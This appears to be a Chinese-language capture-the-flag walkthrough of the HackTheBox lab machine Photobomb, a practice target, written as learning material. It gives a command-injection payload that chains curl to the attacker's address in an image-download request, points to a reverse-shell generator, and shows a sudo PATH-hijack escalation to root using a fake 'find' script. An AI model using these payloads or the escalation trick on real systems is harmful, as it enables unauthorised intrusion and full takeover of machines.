HackTheBox - Machines - Photobomb

目标网址:https://app.hackthebox.com/machines/Photobomb

Hack The Box是一个CTF挑战靶机平台，在线渗透测试平台。它能帮助你提升渗透测试技能和黑盒测试技能，它包含了一些不断更新的挑战，其中有模拟真实世界场景，也有倾向于CTF风格的挑战

https://www.hackthebox.eu/

​ 平台上有很多靶机，从易到难，黑客每入侵一台机器都会获得相应积分，通过积分排名设有名人堂。今天要实验的是靶机Photobomb。

​ 环境：kali

​ 注册并登录hackthebox平台，此时我们没有连接对方实验靶场，需要下载对方vpn并连接。

​ 我这个是连接好的 没连接好 没连接好是下面这样的

​

​ 选择Machines->openVpn->downloadvpn，保存在本地

​

​ 然后直接拉入kali虚拟机连接 如果没有安装VMware tools 可以在本机用python开启一个服务

​ 用kali访问下载

​ 成功的显示

​

​ 如果显示和我一样，那就是成功了

​

如果显示没成功多刷新一下页面，它会有延迟

此时，已成功连接至实验环境，那么选择Photobomb，开始美妙的渗透吧!

靶机：10.10.11.182 攻击机：10.10.16.6

信息收集

Nmap -sC -sV -p- 10.10.11.182

发现了域名 我们写入hosts文件

echo "10.10.11.182 photobomb.htb" >> /etc/hosts

访问域名:http://photobomb.htb

看了一下页面，页面什么也没有 只有一个 click here!我们点下看看 会让我们输入账号和密码

现在看一下网页源代码 发现有一个js文件我们看看

这个文件是刚刚登录框的js文件，这里应该是账号和密码，然后返回登录 尝试登陆

果不其然 登陆进去了，登录后可以下载一些图片，然后就没其他的了，我们使用burp抓一下下载的包

漏洞检测

也没有看出来什么，测试一下参数有没有命令注入的漏洞，用python3开启一个http服务

python3 -m http.server 80

然后回到burp里测试参数，photo和dimensions都没有，在测试到filetype参数的时候就有突破点了

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg;curl+10.10.16.6&filetype=jpg&dimensions=3000x2000

看到了吗？kali收到靶机发出的访问信息，现在我们就该反弹shell了

获取用户权限

推荐一个网站，可以生成很多的反弹shell

https://www.revshells.com/

然后Copy复制在一个txt文件里将里面的空格换成+

然后将这段字符Copy粘贴在

然后发送包

成功获得用户权限

环境变量提权

查看当前用户可以用sudo执行什么东西

sudo -l

这只是个bash脚本，功能是获取日志文件并将其内容移动到photobomb.log.old然后使用truncate清除photobomb.log

最关键的地方就是最后一行的这个命令，他find使用的是相对路径，而不是绝对路径，也就是说，我们改变一下环境变量，然后在当前目录创建一个find文件，里面写一个shell，之后用sudo执行的时候，就能直接获得root权限

echo "/bin/bash" > find
chmod +x find 
sudo PATH=$PWD:$PATH /opt/cleanup.sh   //更改环境变量为当前目录

成功获得root权限

友情提示：系统标志在root目录 root.txt